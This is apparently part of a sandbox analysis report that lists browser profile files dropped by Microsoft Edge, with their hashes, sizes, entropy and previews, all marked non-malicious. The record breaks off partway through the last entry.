Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	432
Entropy (8bit):	4.349302913391365
Encrypted:	false
SSDEEP:	12:S+a8ljljljljlxlcE+fCMeyI9hdSkAvkAvkAv:Ra0ZZZZxlcEXRhdSk8k8k8
MD5:	85315E3FF13AF88C83B59B91342D3861
SHA1:	865EF4D82B194B9567BBD8E81D4909ED440D83E9
SHA-256:	A3BA56B15F3548CC172AA19835377B400F33FF34C2B73078D47FC03BE7683336
SHA-512:	FC06E45194D16648142E5FB6B6086177EAA886C6937229579F2E175B966CDE7E4026B021D0307605471E56B5D8325CE7F049B6BD825453DB9B82BD44919A3406
Malicious:	false
Preview:	*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f.................Dxb................next-map-id.1.Cnamespace-2902c4fe_0162_4948_a6bf_a438951ccba5-https://ntp.msn.com/.0..g.k................map-0-shd_sweeper8{.".x.-.m.s.-.f.l.i.g.h.t.I.d.".:.".g.h.o.l.d.o.u.t.".}...map-0-storageTest. .................. .................. .................. .................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.202433792691891
Encrypted:	false
SSDEEP:	6:HMCOq2PCHhJ23oH+TcwtrQMxIFUt8YM8dZmw+YMt7kwOCHhJ23oH+TcwtrQMFLJ:sCOvBYebCFUt834/+3F56YebtJ
MD5:	BCAA7FD4E10E5F0914E86B7A405B6A7F
SHA1:	80CB35CDE4AA6AA627F06D68EAF2AC27FC6F1816
SHA-256:	22B3236E22D37C4ADC491F8FE1437F1FB6C3E1F48330889F68C04135EF2E91E8
SHA-512:	C5D888F136BA16CC2E351BC9176A9CD2B028C5CC3CB8598645DE6B8361753712724A1B5D2E62F29F6E35391298A554CCC45A9FF053C9FC51CA504ACF66247E93
Malicious:	false
Preview:	2024/11/29-06:27:52.324 1fb0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/11/29-06:27:52.326 1fb0 Recovering log #3.2024/11/29-06:27:52.330 1fb0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.202433792691891
Encrypted:	false
SSDEEP:	6:HMCOq2PCHhJ23oH+TcwtrQMxIFUt8YM8dZmw+YMt7kwOCHhJ23oH+TcwtrQMFLJ:sCOvBYebCFUt834/+3F56YebtJ
MD5:	BCAA7FD4E10E5F0914E86B7A405B6A7F
SHA1:	80CB35CDE4AA6AA627F06D68EAF2AC27FC6F1816
SHA-256:	22B3236E22D37C4ADC491F8FE1437F1FB6C3E1F48330889F68C04135EF2E91E8
SHA-512:	C5D888F136BA16CC2E351BC9176A9CD2B028C5CC3CB8598645DE6B8361753712724A1B5D2E62F29F6E35391298A554CCC45A9FF053C9FC51CA504ACF66247E93
Malicious:	false
Preview:	2024/11/29-06:27:52.324 1fb0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/11/29-06:27:52.326 1fb0 Recovering log #3.2024/11/29-06:27:52.330 1fb0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13377353273505919

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	1443
Entropy (8bit):	3.8239421833209293
Encrypted:	false
SSDEEP:	24:3g1Enl5/zpsAF4unx6ZtLp3X2amEtG1ChqSuenLB5QKkOAM4:3WEnfzzFKTLp2FEkChMenLQHOp
MD5:	318D68DED0E57F6F4667120B72C4F578
SHA1:	1E98A851C5422280C96D318469597CF1181F2538
SHA-256:	82B5C955AB75508AA39FEA15ECF2D36016A1D315E1F9D78A0DD58A7E2417B2BC
SHA-512:	AB4671E55EC1BBDAEADB09296E7F19622146E3FB0C00F8B933BC6FE0689665195C88E6DF72EC651A17E05992ED60AD94B899A215E2FDB3D82F3A948E5C0FA6C4
Malicious:	false
Preview:	SNSS.......... .............. ......"... .............. .......... .......... .......... ....!..... .................................. ... 1..,...... $...2902c4fe_0162_4948_a6bf_a438951ccba5...... .......... ....V.c........... ...... .......................... ....................5..0...... &...{890D5FC3-0C4C-4214-A93A-B8E730A022A1}........ .......... ............................. .............. ........edge://newtab/......N.e.w. .t.a.b...........!...............................................................x...............................x.......Ayy}.(..Byy}.(.................................. ...................................................r...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.G.B.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.i.s.F.R.E.M.o.d.a.l.B.a.c.k.g.r.o.u.n.d.=.1.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.....................................8.......0.......8............................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Shortcuts

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.44194574462308833
Encrypted:	false
SSDEEP:	12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
MD5:	B35F740AA7FFEA282E525838EABFE0A6
SHA1:	A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
SHA-256:	5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
SHA-512:	05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	352
Entropy (8bit):	5.127512974752248
Encrypted:	false
SSDEEP:	6:HMbL9VFU2q2PCHhJ23oH+Tcwt7Uh2ghZIFUt8YMbL9VFUvZmw+YMbL9LzkwOCHhd:sv9Vu2vBYebIhHh2FUt83v9Vuv/+3v9Z
MD5:	14985D4D23DF514D90C87F5407A7E1D8
SHA1:	013A6595CF80C467D7570029003EF4007434F8BD
SHA-256:	18D6103CE526DA4972F3EE7AC857D7575ACCD268DDB0332A00354A283FC93121
SHA-512:	82F600529AC0F957BED619B046A3154E66DC4F9DE98B336ADE79325231A5162EAF5618C2E079B7B917A52CF2F787142B9BB317EB31CCCC669A0BF9E1AE778CED
Malicious:	false
Preview:	2024/11/29-06:27:51.020 11e4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/11/29-06:27:51.020 11e4 Recovering log #3.2024/11/29-06:27:51.021 11e4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	352
Entropy (8bit):	5.127512974752248
Encrypted:	false
SSDEEP:	6:HMbL9VFU2q2PCHhJ23oH+Tcwt7Uh2ghZIFUt8YMbL9VFUvZmw+YMbL9LzkwOCHhd:sv9Vu2vBYebIhHh2FUt83v9Vuv/+3v9Z
MD5:	14985D4D23DF514D90C87F5407A7E1D8
SHA1:	013A6595CF80C467D7570029003EF4007434F8BD
SHA-256:	18D6103CE526DA4972F3EE7AC857D7575ACCD268DDB0332A00354A283FC93121
SHA-512:	82F600529AC0F957BED619B046A3154E66DC4F9DE98B336ADE79325231A5162EAF5618C2E079B7B917A52CF2F787142B9BB317EB31CCCC669A0BF9E1AE778CED
Malicious:	false
Preview:	2024/11/29-06:27:51.020 11e4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/11/29-06:27:51.020 11e4 Recovering log #3.2024/11/29-06:27:51.021 11e4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	0.0012471779557650352
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2zE:/M/xT02z
MD5:	F50F89A0A91564D0B8A211F8921AA7DE
SHA1:	112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
SHA-256:	B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
SHA-512:	BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	0.0012471779557650352
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2zE:/M/xT02z
MD5:	F50F89A0A91564D0B8A211F8921AA7DE
SHA1:	112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
SHA-256:	B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
SHA-512:	BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	431
Entropy (8bit):	5.243942573365244
Encrypted:	false
SSDEEP:	6:HMmsVq2PCHhJ23oH+TcwtzjqEKj3K/2jMGIFUt8YMkgZmw+YMCIkwOCHhJ23oH+w:stvBYebvqBQFUt83N/+3156YebvqBvJ
MD5:	45452D1910489CC73E71F86897DAC12E
SHA1:	851866C8F50628ECB2F5E69FE4FF90BAABC737C8
SHA-256:	FAA43D9C12231C28DF9CF2465F64795AABF8D039A03869346751C8F6BFE49A37
SHA-512:	B0D5292188415965C7D839DB7D285159CDFACD07C4471077E28FF463E15C99B50811D7CF017A0889E9915E0665DEEAC013DB9DDAAA52FCB4CCA68B77A69803D4
Malicious:	false
Preview:	2024/11/29-06:27:52.312 260 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/11/29-06:27:52.313 260 Recovering log #3.2024/11/29-06:27:52.320 260 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	431
Entropy (8bit):	5.243942573365244
Encrypted:	false
SSDEEP:	6:HMmsVq2PCHhJ23oH+TcwtzjqEKj3K/2jMGIFUt8YMkgZmw+YMCIkwOCHhJ23oH+w:stvBYebvqBQFUt83N/+3156YebvqBvJ
MD5:	45452D1910489CC73E71F86897DAC12E
SHA1:	851866C8F50628ECB2F5E69FE4FF90BAABC737C8
SHA-256:	FAA43D9C12231C28DF9CF2465F64795AABF8D039A03869346751C8F6BFE49A37
SHA-512:	B0D5292188415965C7D839DB7D285159CDFACD07C4471077E28FF463E15C99B50811D7CF017A0889E9915E0665DEEAC013DB9DDAAA52FCB4CCA68B77A69803D4
Malicious:	false
Preview:	2024/11/29-06:27:52.312 260 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/11/29-06:27:52.313 260 Recovering log #3.2024/11/29-06:27:52.320 260 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\1564940b-b54f-4fd3-af02-d1272e2d654a.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\46284ba0-aa52-4c5a-993a-32c7abb584f7.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF2cac8.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Sdch Dictionaries (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Trust Tokens

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	36864
Entropy (8bit):	0.3886039372934488
Encrypted:	false
SSDEEP:	24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
MD5:	DEA619BA33775B1BAEEC7B32110CB3BD
SHA1:	949B8246021D004B2E772742D34B2FC8863E1AAA
SHA-256:	3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
SHA-512:	7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\a770e6d2-20d5-4e1e-9780-76544eb39d25.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	80
Entropy (8bit):	3.4921535629071894
Encrypted:	false
SSDEEP:	3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
MD5:	69449520FD9C139C534E2970342C6BD8
SHA1:	230FE369A09DEF748F8CC23AD70FD19ED8D1B885
SHA-256:	3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
SHA-512:	EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
Malicious:	false
Preview:	*...#................version.1..namespace-..&f.................&f...............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	422
Entropy (8bit):	5.241673250922273
Encrypted:	false
SSDEEP:	6:HM+Nlq2PCHhJ23oH+TcwtzjqEKj0QMxIFUt8YM+RBZmw+YM+WkwOCHhJ23oH+Tcq:sSvBYebvqBZFUt838B/+3556YebvqBaJ
MD5:	91CF8FFC236888EA54C7D5A527D0669B
SHA1:	E681DBFC6D7255DD7E3CF3FF0327D38A32248F8D
SHA-256:	D08AF9034E676AE6A5A52785A142270E0D7DE7D16C7DAC70AAAB947452F3C1A7
SHA-512:	350487CA49C79A09A05D07E262875CF4A2A35CD405CE0FB75AA7D5C5D03E87E18E69548B1C36257461BFF18673B4C2043772F6DFEE19D675032A6D3786B5AC46
Malicious:	false
Preview:	2024/11/29-06:28:10.485 1fb0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/11/29-06:28:10.486 1fb0 Recovering log #3.2024/11/29-06:28:10.492 1fb0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	422
Entropy (8bit):	5.241673250922273
Encrypted:	false
SSDEEP:	6:HM+Nlq2PCHhJ23oH+TcwtzjqEKj0QMxIFUt8YM+RBZmw+YM+WkwOCHhJ23oH+Tcq:sSvBYebvqBZFUt838B/+3556YebvqBaJ
MD5:	91CF8FFC236888EA54C7D5A527D0669B
SHA1:	E681DBFC6D7255DD7E3CF3FF0327D38A32248F8D
SHA-256:	D08AF9034E676AE6A5A52785A142270E0D7DE7D16C7DAC70AAAB947452F3C1A7
SHA-512:	350487CA49C79A09A05D07E262875CF4A2A35CD405CE0FB75AA7D5C5D03E87E18E69548B1C36257461BFF18673B4C2043772F6DFEE19D675032A6D3786B5AC46
Malicious:	false
Preview:	2024/11/29-06:28:10.485 1fb0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/11/29-06:28:10.486 1fb0 Recovering log #3.2024/11/29-06:28:10.492 1fb0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	325
Entropy (8bit):	5.25447653549922
Encrypted:	false
SSDEEP:	6:HMbLs34q2PCHhJ23oH+TcwtpIFUt8YMbLdZmw+YMbLvkwOCHhJ23oH+Tcwta/WLJ:svs34vBYebmFUt83vd/+3vv56YebaUJ
MD5:	6302449586F257CD0779EA098EA7C89E
SHA1:	E5D3C7E969FAB3C16A11D358B188AEE0FE497D1F
SHA-256:	0926CAE13EAE1F13B7F4B6E853AC78CB8ECA9B70501EF1C763670DBE123BD37D
SHA-512:	25256B90F3724A3E4063031E89441835B56D948A0E6E8140C8A3FDC4739A0070954DC4CDAAC283FC09018C5EA04306097A59740C531B4BBA33B5954E9C506EC9
Malicious:	false
Preview:	2024/11/29-06:27:51.030 750 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/11/29-06:27:51.031 750 Recovering log #3.2024/11/29-06:27:51.031 750 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	325
Entropy (8bit):	5.25447653549922
Encrypted:	false
SSDEEP:	6:HMbLs34q2PCHhJ23oH+TcwtpIFUt8YMbLdZmw+YMbLvkwOCHhJ23oH+Tcwta/WLJ:svs34vBYebmFUt83vd/+3vv56YebaUJ
MD5:	6302449586F257CD0779EA098EA7C89E
SHA1:	E5D3C7E969FAB3C16A11D358B188AEE0FE497D1F
SHA-256:	0926CAE13EAE1F13B7F4B6E853AC78CB8ECA9B70501EF1C763670DBE123BD37D
SHA-512:	25256B90F3724A3E4063031E89441835B56D948A0E6E8140C8A3FDC4739A0070954DC4CDAAC283FC09018C5EA04306097A59740C531B4BBA33B5954E9C506EC9
Malicious:	false
Preview:	2024/11/29-06:27:51.030 750 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/11/29-06:27:51.031 750 Recovering log #3.2024/11/29-06:27:51.031 750 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 9, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 9
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.2650332555763906
Encrypted:	false
SSDEEP:	384:KrJ/2qOB1nxCkM7SAELyKOMq+8QTQKC+CVumj/:K0q+n0J79ELyKOMq+8Q7k/
MD5:	DAA0017B66155FF219DC89579A56A06B
SHA1:	53D9C443240B6FC69372C91F8B0F0A1271458186
SHA-256:	82B9F23B6E75621F20E4EB34D148F09C007235B29636CE9F4A405C598011CA29
SHA-512:	09654ECEF99BFA5892EF1D366F98188DBA6F845E4031EEF09679C9BBC0468DDEEC81859719E6D07E6CE0F6E8CF47C93F96BC99AF67FCD29A55D8AA381D49F471
Malicious:	false
Preview:	SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\WebStorage\QuotaManager

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.4670634777494995
Encrypted:	false
SSDEEP:	48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcB0x0:v7doKsKuKZKlZNmu46yjx0G
MD5:	489836324DA434BE18A8F55706D1D8A8
SHA1:	437BB50830D1568946D753CFE4F2EC44E41EF815
SHA-256:	1B35F8E2524494291DC9479A2A1A15C5B9227B708AF8B4DBA8912E4777ECADCD
SHA-512:	2D8DD4C29A2AEC9F859D26BF0F6838AFEBA6D6C5A63C57809B92AA6CE9B97BC112DC9C90C4E6C07E571E06D0CB785672C62CC3F70EB538F23FD8809E6EF3C0F3
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.......w..g...........M...w..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\arbitration_service_config.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (3951), with CRLF line terminators
Category:	dropped
Size (bytes):	11755
Entropy (8bit):	5.190465908239046
Encrypted:	false
SSDEEP:	192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
MD5:	07301A857C41B5854E6F84CA00B81EA0
